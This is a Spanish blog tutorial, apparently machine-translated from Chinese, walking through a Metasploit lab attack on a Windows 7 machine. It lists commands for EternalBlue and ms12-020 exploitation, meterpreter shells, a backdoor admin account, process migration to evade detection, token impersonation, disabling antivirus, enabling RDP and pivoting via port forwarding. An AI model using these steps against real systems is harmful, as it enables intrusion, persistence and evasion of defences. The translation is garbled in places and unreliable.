Caso de penetración de la herramienta metasploit de Kali: explicación súper detallada de Xiao Hei

Metasploit (MSF), para abreviar, es una de las herramientas de penetración más poderosas de Kali y se dice que es una herramienta que puede piratear todo el universo.

En el artículo anterior se introdujo en detalle el uso de las herramientas de MSF y la descripción de cada módulo, este artículo se utiliza como caso para explicarlo en detalle.

Explicación ultra detallada de la penetración de metasploit (MSF): herramienta de penetración de Xiaohei_módulo kiwi_blog de registro de Xiaohei-blog de CSDN

Tabla de contenido

1. Composición de herramientas

2. Método de inicio

3. Experimentar

4. Proceso de ataque

    1. Explotación de vulnerabilidades

    2. Configuración de parámetros 

    3. Manipular el host de destino

    4. Obtener cáscara

     5. Implantación de puerta trasera

     6. Supongamos que falla la obtención del shell.

      7. Shell de enlace de proceso

      8. Falsificación de fichas

      9. Comando posterior a la infiltración

     10. Inicie el puerto remoto

     11. Reenvío de puertos

     12. Configurar la puerta de enlace de enrutamiento

     13. Ver todos los usuarios actuales

     14. Agregar línea de comando de usuario (sin shell)

      15、Sesión 


1. Composición de herramientas

Aux  辅助模块                          主要是信息搜集
Exploits 模块                          主要是渗透攻击
Post后渗透攻击模块                     攻击主机控制与拓展攻击
Startx                                 启动进入图形化界面
ifconfig 网卡 172.16.0.22(修改的ip)  netmask 255.255.255.0  up
修改网卡配置

2. Método de inicio

El primero es utilizar directamente la herramienta para comenzar.

El segundo es ingresar el comando msfconsole para ingresar a la terminal de msf.

Salir sale del programa exploit

3. Experimentar

ambiente de laboratorio:

La máquina Kali es 192.168.8.39 (experimental)

Objetivo drone win7: 192.168.8.238

Primero, debes hacer ping al dron objetivo.

4. Proceso de ataque

1. msfconsole ingresa al marco de msfconsole

2. Buscar ms12-020 Buscar vulnerabilidad ms12_020

3. use auxliliary/dos/windows/rdp/ms12_020_maxchannelids para usar esta vulnerabilidad

Tenga en cuenta que al buscar ms12-020 para ver esta vulnerabilidad, se muestra la ruta a esta vulnerabilidad.

 

 

    1. Explotación de vulnerabilidades

Ms17_010 Explotación de EternalBlue

 

 Puertos disponibles. El sí detrás de ellos significa que se pueden utilizar.

   

        2. Configuración de parámetros 

Información relacionada con la configuración

1. mostrar opciones para ver la configuración de parámetros relevantes

2. configure RHOSTS 172.16.0.119 Establezca la dirección IP de la máquina de destino

3. nmap –sV 172.16.0.119 escanea los puertos abiertos del host de destino

4. configure RPORT 445 Configure el puerto abierto 445 del dron objetivo

5. corre para iniciar el ataque

Respuesta después de un ataque exitoso

El No. 1 hace referencia a la exitosa cobertura de Eternal Blue

El número 2 se refiere al objetivo y la máquina atacante que establecen una sesión de conexión de shell como sesión1.

      3. Manipular el host de destino

Cmd para controlar la máquina de destino

sysinfo muestra información del sistema host remoto

getuid Ver identidad del usuario

captura de pantalla Tome una captura de pantalla de la pantalla actual del host remoto (la captura de pantalla mostrará la ruta para guardar)

 

      4. Obtener cáscara

Obtener el shell de la consola shell

       5. Implantación de puerta trasera

Ingrese a la implantación de puerta trasera (cree una nueva cuenta de administrador)

Hack de usuario de red 123456 /add crea un usuario de hack en Windows7

Los administradores del grupo local de red piratean / agregan Agregar usuario de pirateo al grupo de usuarios administradores locales de Windows 7 Usuario de red Ver usuario    

Los administradores de net localgroup ven los administradores locales de Windows 7.

La primera forma de hacer una puerta trasera es crear un usuario y la segunda es recordar su usuario administrador local.  

     6. Supongamos que falla la obtención del shell.

obtener cáscara

¿Qué debemos hacer si el ataque tiene éxito pero no logra obtener el caparazón?

Cuando nuestro ataque tenga éxito, iremos al módulo meterpreter.

Meterpreter debe ampliarse con un módulo que pueda usarse como carga de ataque y que, después de establecer una conexión, pueda penetrar más profundamente en el sistema objetivo.

       7. Shell de enlace de proceso

1. Evite la detección y la eliminación vinculando meterpreter shell a un proceso estable

Ps Haga que el programa se ejecute en el host de destino

Getpid Ver el número de proceso del shell meterpreter

Migrar + número de proceso estable (manual) Vincular a través del número de proceso en ejecución

Ejecute post/windows/manage/migrate para migrar procesos automáticamente

         8. Falsificación de fichas

Falsificación de tokens ( ampliada )  

use incógnito para ingresar a este módulo

list_tokens-u Ver tokens existentes

impersonate_token +     suplantación de token de nombre de usuario (debe estar separado por barras dobles)

getuid comprueba si el cambio de identidad se realizó correctamente

 

         9. Comando posterior a la infiltración

2. El impresionante comando post-penetración

sysinfo Ver información del sistema

idletime Verifique el tiempo de ejecución del host de destino

ejecute post/window/gather/checkvm getuid para ver el usuario host actual y sus permisos

ejecute post/windows/manage/killav para desactivar el software antivirus

     10. Inicie el puerto remoto

3. Enlace importante: puerto de inicio 3389 del host de destino

ejecute post/windwos/manage/enable_rdp para abrir el puerto

ruta Ver información de LAN

        11. Reenvío de puertos

background Ponga la sesión actual en segundo plano (se recomienda abrir una línea de comando separada)

Reenviar el puerto 3389 abierto por la máquina de destino a la máquina local

portfwd add –l 2222 –p 3389 –r 172.16.0.119 (máquina de destino)

ejecute getgui –f 6661 –e se creó la retransmisión TCP local

rdesktop 172.16.0.115:4444 Ejecutar puerto vinculado en Linux nueva ventana

         12. Configurar la puerta de enlace de enrutamiento

 agregar ruta –net 172.16.0.0 máscara de red 255.255.0.0 gw 172.16.0.115

El significado es: agregue enrutamiento de segmento de red netstat –rn para ver la ruta actual

   

13. Ver todos los usuarios actuales

       14. Agregar línea de comando de usuario (sin shell)

ejecute post/windows/manage/enable_rdp NOMBRE DE USUARIO-xie CONTRASEÑA-123456

Se ha agregado el usuario, pero la máquina de destino debe estar de acuerdo al ejecutar, por lo que es muy inútil.

      15、Sesión 

Una sesión corresponde a una sesión, que se utiliza para conexiones u operaciones de múltiples shells. Puede ver el número de sesiones en segundo plano a través de sesiones directas.

background pone la sesión actual en segundo plano

sesión -i ID ingresa a la sesión de ID

sesión -k ID cerrar sesión

Supongo que te gusta

Origin blog.csdn.net/G_WEB_Xie/article/details/132831921
Recomendado
Clasificación